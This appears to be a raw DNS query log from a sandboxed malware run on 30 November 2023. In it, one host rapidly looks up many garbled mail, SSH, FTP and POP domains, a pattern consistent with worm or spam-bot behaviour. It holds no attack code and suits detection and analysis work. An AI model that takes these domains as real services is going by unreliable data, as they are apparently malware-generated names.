Nov 30, 2023 11:22:40.321944952 CET	192.168.2.4	1.1.1.1	0x9820	Standard query (0)	ftp.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.322407007 CET	192.168.2.4	1.1.1.1	0xbdd0	Standard query (0)	ssh.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.323152065 CET	192.168.2.4	1.1.1.1	0x5651	Standard query (0)	mail.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.323836088 CET	192.168.2.4	1.1.1.1	0x68a9	Standard query (0)	mail.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.325860023 CET	192.168.2.4	1.1.1.1	0xdcba	Standard query (0)	mail.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.416845083 CET	192.168.2.4	1.1.1.1	0xec51	Standard query (0)	daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.427882910 CET	192.168.2.4	1.1.1.1	0xaa56	Standard query (0)	mail.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.429589987 CET	192.168.2.4	1.1.1.1	0x5b5f	Standard query (0)	mail.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.429589987 CET	192.168.2.4	1.1.1.1	0xd3e4	Standard query (0)	ssh.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.429589987 CET	192.168.2.4	1.1.1.1	0xff84	Standard query (0)	ssh.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.430263042 CET	192.168.2.4	1.1.1.1	0xe19e	Standard query (0)	mail.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.470000029 CET	192.168.2.4	1.1.1.1	0xa0fc	Standard query (0)	mail.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.470000029 CET	192.168.2.4	1.1.1.1	0x4a5a	Standard query (0)	ssh.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.470000029 CET	192.168.2.4	1.1.1.1	0xd05b	Standard query (0)	ftp.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.470323086 CET	192.168.2.4	1.1.1.1	0x17d6	Standard query (0)	mail.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.473326921 CET	192.168.2.4	1.1.1.1	0x2daa	Standard query (0)	mailgate.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.473326921 CET	192.168.2.4	1.1.1.1	0xa09d	Standard query (0)	mail.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.473326921 CET	192.168.2.4	1.1.1.1	0xfde5	Standard query (0)	mail.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.473402977 CET	192.168.2.4	1.1.1.1	0xc73a	Standard query (0)	mail.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.474170923 CET	192.168.2.4	1.1.1.1	0xedbf	Standard query (0)	ssh.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.489279032 CET	192.168.2.4	1.1.1.1	0x2d8c	Standard query (0)	ftp.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.489331007 CET	192.168.2.4	1.1.1.1	0x66e5	Standard query (0)	mail.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.612026930 CET	192.168.2.4	1.1.1.1	0xcc85	Standard query (0)	ftp.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.612122059 CET	192.168.2.4	1.1.1.1	0x755f	Standard query (0)	ftp.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613316059 CET	192.168.2.4	1.1.1.1	0xe465	Standard query (0)	ftp.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613343954 CET	192.168.2.4	1.1.1.1	0xbba	Standard query (0)	mail.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613364935 CET	192.168.2.4	1.1.1.1	0xd511	Standard query (0)	ftp.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613390923 CET	192.168.2.4	1.1.1.1	0xcb9c	Standard query (0)	mail.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613411903 CET	192.168.2.4	1.1.1.1	0x3991	Standard query (0)	ftp.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613434076 CET	192.168.2.4	1.1.1.1	0x2659	Standard query (0)	sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613476992 CET	192.168.2.4	1.1.1.1	0x82f5	Standard query (0)	pop.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613492012 CET	192.168.2.4	1.1.1.1	0xe4fd	Standard query (0)	pop.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613513947 CET	192.168.2.4	1.1.1.1	0xbdd0	Standard query (0)	ssh.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.613560915 CET	192.168.2.4	1.1.1.1	0x9df5	Standard query (0)	mail.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.618483067 CET	192.168.2.4	1.1.1.1	0x47a6	Standard query (0)	ssh.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.618941069 CET	192.168.2.4	1.1.1.1	0x2e31	Standard query (0)	mail.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.623473883 CET	192.168.2.4	1.1.1.1	0x6a0b	Standard query (0)	ssh.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.624526024 CET	192.168.2.4	1.1.1.1	0x9c6d	Standard query (0)	pop.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.636136055 CET	192.168.2.4	1.1.1.1	0xcf10	Standard query (0)	pop.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.638760090 CET	192.168.2.4	1.1.1.1	0x5859	Standard query (0)	imap.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.639497995 CET	192.168.2.4	1.1.1.1	0x8a6b	Standard query (0)	mail.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.641587019 CET	192.168.2.4	1.1.1.1	0xeede	Standard query (0)	ssh.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.641969919 CET	192.168.2.4	1.1.1.1	0x2c75	Standard query (0)	mail.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.719319105 CET	192.168.2.4	1.1.1.1	0xc481	Standard query (0)	ssh.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.719319105 CET	192.168.2.4	1.1.1.1	0x2cba	Standard query (0)	mail.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.719319105 CET	192.168.2.4	1.1.1.1	0x452b	Standard query (0)	pop3.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.720288992 CET	192.168.2.4	1.1.1.1	0x307d	Standard query (0)	ssh.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.724391937 CET	192.168.2.4	1.1.1.1	0x2930	Standard query (0)	ssh.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.731849909 CET	192.168.2.4	1.1.1.1	0xfde5	Standard query (0)	mail.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.731898069 CET	192.168.2.4	1.1.1.1	0xa0fc	Standard query (0)	mail.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.731916904 CET	192.168.2.4	1.1.1.1	0xedbf	Standard query (0)	ssh.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.734554052 CET	192.168.2.4	1.1.1.1	0x6f39	Standard query (0)	mail.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.738792896 CET	192.168.2.4	1.1.1.1	0xc75c	Standard query (0)	mail.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.742319107 CET	192.168.2.4	1.1.1.1	0x14a9	Standard query (0)	ssh.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.743222952 CET	192.168.2.4	1.1.1.1	0x1df4	Standard query (0)	ssh.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.744395018 CET	192.168.2.4	1.1.1.1	0x42d4	Standard query (0)	ssh.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.745361090 CET	192.168.2.4	1.1.1.1	0xe366	Standard query (0)	pop3.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.747955084 CET	192.168.2.4	1.1.1.1	0x4227	Standard query (0)	ssh.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.748255968 CET	192.168.2.4	1.1.1.1	0x755a	Standard query (0)	ssh.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.748585939 CET	192.168.2.4	1.1.1.1	0x43cf	Standard query (0)	ssh.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.748971939 CET	192.168.2.4	1.1.1.1	0x66df	Standard query (0)	ssh.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.972501993 CET	192.168.2.4	1.1.1.1	0x5f80	Standard query (0)	mailgate.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.985383034 CET	192.168.2.4	1.1.1.1	0x2e31	Standard query (0)	mail.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.157072067 CET	192.168.2.4	1.1.1.1	0xe802	Standard query (0)	yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.157475948 CET	192.168.2.4	1.1.1.1	0x905c	Standard query (0)	imap.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.159356117 CET	192.168.2.4	1.1.1.1	0x93e2	Standard query (0)	ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.160018921 CET	192.168.2.4	1.1.1.1	0x55ad	Standard query (0)	horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.160821915 CET	192.168.2.4	1.1.1.1	0xa5e8	Standard query (0)	fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.161017895 CET	192.168.2.4	1.1.1.1	0xc7ab	Standard query (0)	deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.161505938 CET	192.168.2.4	1.1.1.1	0x2d11	Standard query (0)	gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.161878109 CET	192.168.2.4	1.1.1.1	0x4b63	Standard query (0)	ssh.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.162781000 CET	192.168.2.4	1.1.1.1	0x8932	Standard query (0)	aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.163300991 CET	192.168.2.4	1.1.1.1	0xaddd	Standard query (0)	mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.163502932 CET	192.168.2.4	1.1.1.1	0xde60	Standard query (0)	klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.163996935 CET	192.168.2.4	1.1.1.1	0x2637	Standard query (0)	ssh.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.164272070 CET	192.168.2.4	1.1.1.1	0x8edd	Standard query (0)	comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.164614916 CET	192.168.2.4	1.1.1.1	0x43ed	Standard query (0)	a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.164963007 CET	192.168.2.4	1.1.1.1	0x562d	Standard query (0)	yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.165366888 CET	192.168.2.4	1.1.1.1	0xe777	Standard query (0)	mail.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.165891886 CET	192.168.2.4	1.1.1.1	0x4820	Standard query (0)	e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.166290998 CET	192.168.2.4	1.1.1.1	0x3a52	Standard query (0)	ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.166811943 CET	192.168.2.4	1.1.1.1	0x67ba	Standard query (0)	geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.167300940 CET	192.168.2.4	1.1.1.1	0x4cf3	Standard query (0)	ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.168517113 CET	192.168.2.4	1.1.1.1	0x9acf	Standard query (0)	hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.173918009 CET	192.168.2.4	1.1.1.1	0xd6ed	Standard query (0)	n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.174894094 CET	192.168.2.4	1.1.1.1	0x1df4	Standard query (0)	mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.175429106 CET	192.168.2.4	1.1.1.1	0x637f	Standard query (0)	1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.176054955 CET	192.168.2.4	1.1.1.1	0xa2c9	Standard query (0)	ssh.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.176300049 CET	192.168.2.4	1.1.1.1	0x7790	Standard query (0)	yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.177500963 CET	192.168.2.4	1.1.1.1	0xfd3d	Standard query (0)	mail.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.178468943 CET	192.168.2.4	1.1.1.1	0xcc8c	Standard query (0)	h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.179327965 CET	192.168.2.4	1.1.1.1	0xd416	Standard query (0)	mail.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.249155045 CET	192.168.2.4	1.1.1.1	0xe1a9	Standard query (0)	t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.250802994 CET	192.168.2.4	1.1.1.1	0xc5d0	Standard query (0)	yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.253249884 CET	192.168.2.4	1.1.1.1	0xc75c	Standard query (0)	cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.253968000 CET	192.168.2.4	1.1.1.1	0x649e	Standard query (0)	il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.254498959 CET	192.168.2.4	1.1.1.1	0x8025	Standard query (0)	yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.256239891 CET	192.168.2.4	1.1.1.1	0x39a7	Standard query (0)	he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.256823063 CET	192.168.2.4	1.1.1.1	0xacf	Standard query (0)	gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.257364035 CET	192.168.2.4	1.1.1.1	0x5f41	Standard query (0)	syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.260376930 CET	192.168.2.4	1.1.1.1	0x9c51	Standard query (0)	h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.261012077 CET	192.168.2.4	1.1.1.1	0xd6e9	Standard query (0)	ssh.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.267047882 CET	192.168.2.4	1.1.1.1	0xd095	Standard query (0)	ssh.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.267537117 CET	192.168.2.4	1.1.1.1	0xf0d2	Standard query (0)	rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.267807007 CET	192.168.2.4	1.1.1.1	0x26a5	Standard query (0)	as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.268675089 CET	192.168.2.4	1.1.1.1	0xe824	Standard query (0)	ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.269357920 CET	192.168.2.4	1.1.1.1	0xfd7b	Standard query (0)	m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.269587040 CET	192.168.2.4	1.1.1.1	0x5890	Standard query (0)	ssh.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.270039082 CET	192.168.2.4	1.1.1.1	0x911b	Standard query (0)	imap.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.270646095 CET	192.168.2.4	1.1.1.1	0x14c6	Standard query (0)	asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.271266937 CET	192.168.2.4	1.1.1.1	0x863d	Standard query (0)	ssh.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.271692038 CET	192.168.2.4	1.1.1.1	0x546b	Standard query (0)	ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.272933006 CET	192.168.2.4	1.1.1.1	0xdf87	Standard query (0)	wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.273329020 CET	192.168.2.4	1.1.1.1	0x42a6	Standard query (0)	gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.273646116 CET	192.168.2.4	1.1.1.1	0xf2d4	Standard query (0)	ssh.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.274197102 CET	192.168.2.4	1.1.1.1	0x6263	Standard query (0)	ssh.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.275739908 CET	192.168.2.4	1.1.1.1	0x1aa4	Standard query (0)	pop3.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.275901079 CET	192.168.2.4	1.1.1.1	0x71a8	Standard query (0)	nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.276134014 CET	192.168.2.4	1.1.1.1	0xcd79	Standard query (0)	feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.282282114 CET	192.168.2.4	1.1.1.1	0x93b5	Standard query (0)	ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.284115076 CET	192.168.2.4	1.1.1.1	0x98a3	Standard query (0)	ssh.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.284476042 CET	192.168.2.4	1.1.1.1	0xeecd	Standard query (0)	yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.285566092 CET	192.168.2.4	1.1.1.1	0xbe09	Standard query (0)	ssh.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.285870075 CET	192.168.2.4	1.1.1.1	0x4370	Standard query (0)	mailgate.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.286998987 CET	192.168.2.4	1.1.1.1	0x1dad	Standard query (0)	gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.287836075 CET	192.168.2.4	1.1.1.1	0xc79a	Standard query (0)	ssh.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.292059898 CET	192.168.2.4	1.1.1.1	0x219b	Standard query (0)	sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.297367096 CET	192.168.2.4	1.1.1.1	0xe25d	Standard query (0)	rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.297970057 CET	192.168.2.4	1.1.1.1	0x2047	Standard query (0)	a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.302122116 CET	192.168.2.4	1.1.1.1	0x19c9	Standard query (0)	s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.311743021 CET	192.168.2.4	1.1.1.1	0x595f	Standard query (0)	pop.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.312295914 CET	192.168.2.4	1.1.1.1	0xa76d	Standard query (0)	pop.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.312601089 CET	192.168.2.4	1.1.1.1	0xb995	Standard query (0)	pop.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.317380905 CET	192.168.2.4	1.1.1.1	0x9862	Standard query (0)	acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.331005096 CET	192.168.2.4	1.1.1.1	0x7881	Standard query (0)	pop.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.440730095 CET	192.168.2.4	1.1.1.1	0x1df4	Standard query (0)	mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.440730095 CET	192.168.2.4	1.1.1.1	0x637f	Standard query (0)	1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.441848993 CET	192.168.2.4	1.1.1.1	0x52d8	Standard query (0)	7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.441848993 CET	192.168.2.4	1.1.1.1	0x3298	Standard query (0)	gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.443119049 CET	192.168.2.4	1.1.1.1	0x188e	Standard query (0)	ssh.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.466171026 CET	192.168.2.4	1.1.1.1	0xf243	Standard query (0)	ssh.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.467302084 CET	192.168.2.4	1.1.1.1	0xa1e8	Standard query (0)	ssh.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.468033075 CET	192.168.2.4	1.1.1.1	0xf8b	Standard query (0)	as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.468033075 CET	192.168.2.4	1.1.1.1	0x6ff0	Standard query (0)	ssh.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.468807936 CET	192.168.2.4	1.1.1.1	0x24db	Standard query (0)	mail.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.468808889 CET	192.168.2.4	1.1.1.1	0x991	Standard query (0)	ssh.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.468808889 CET	192.168.2.4	1.1.1.1	0x3d5a	Standard query (0)	slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.469258070 CET	192.168.2.4	1.1.1.1	0x7d7c	Standard query (0)	relay.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.469484091 CET	192.168.2.4	1.1.1.1	0x36f7	Standard query (0)	ssh.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.469484091 CET	192.168.2.4	1.1.1.1	0x9fd	Standard query (0)	pop.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.470036983 CET	192.168.2.4	1.1.1.1	0x17ad	Standard query (0)	ssh.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.470036983 CET	192.168.2.4	1.1.1.1	0x792e	Standard query (0)	yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.470613956 CET	192.168.2.4	1.1.1.1	0xb88f	Standard query (0)	ssh.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.471458912 CET	192.168.2.4	1.1.1.1	0x4632	Standard query (0)	imap.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.471944094 CET	192.168.2.4	1.1.1.1	0x7667	Standard query (0)	mail.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.472278118 CET	192.168.2.4	1.1.1.1	0x44da	Standard query (0)	ssh.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.472279072 CET	192.168.2.4	1.1.1.1	0xcacf	Standard query (0)	f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.472558975 CET	192.168.2.4	1.1.1.1	0x4904	Standard query (0)	yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.472558975 CET	192.168.2.4	1.1.1.1	0xc43	Standard query (0)	pop.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.473064899 CET	192.168.2.4	1.1.1.1	0x8d74	Standard query (0)	ssh.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.473064899 CET	192.168.2.4	1.1.1.1	0x99b	Standard query (0)	pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.473263979 CET	192.168.2.4	1.1.1.1	0x69cc	Standard query (0)	h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.473263979 CET	192.168.2.4	1.1.1.1	0x1f7	Standard query (0)	hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.473413944 CET	192.168.2.4	1.1.1.1	0x2e61	Standard query (0)	ssh.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.473413944 CET	192.168.2.4	1.1.1.1	0x7b19	Standard query (0)	ssh.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.473675013 CET	192.168.2.4	1.1.1.1	0x732e	Standard query (0)	ssh.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.473675013 CET	192.168.2.4	1.1.1.1	0xfbff	Standard query (0)	ssh.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.474725962 CET	192.168.2.4	1.1.1.1	0x821a	Standard query (0)	ssh.yahpl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.474725962 CET	192.168.2.4	1.1.1.1	0x6ca5	Standard query (0)	ssh.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.474725962 CET	192.168.2.4	1.1.1.1	0xf2cf	Standard query (0)	ssh.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.475251913 CET	192.168.2.4	1.1.1.1	0x5c16	Standard query (0)	qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.477171898 CET	192.168.2.4	1.1.1.1	0x4c41	Standard query (0)	ssh.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.477171898 CET	192.168.2.4	1.1.1.1	0x9d1c	Standard query (0)	ssh.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.477171898 CET	192.168.2.4	1.1.1.1	0x2515	Standard query (0)	jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.477171898 CET	192.168.2.4	1.1.1.1	0xfa03	Standard query (0)	lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.479033947 CET	192.168.2.4	1.1.1.1	0x1bd5	Standard query (0)	caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.479033947 CET	192.168.2.4	1.1.1.1	0x282	Standard query (0)	pop.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.479033947 CET	192.168.2.4	1.1.1.1	0x239d	Standard query (0)	oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.479033947 CET	192.168.2.4	1.1.1.1	0x3a57	Standard query (0)	e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.479720116 CET	192.168.2.4	1.1.1.1	0xaf49	Standard query (0)	rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.479720116 CET	192.168.2.4	1.1.1.1	0x575b	Standard query (0)	ssh.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.486747980 CET	192.168.2.4	1.1.1.1	0xaf8	Standard query (0)	pop.comcaci.net	A (IP address)	IN (0x0001)	false
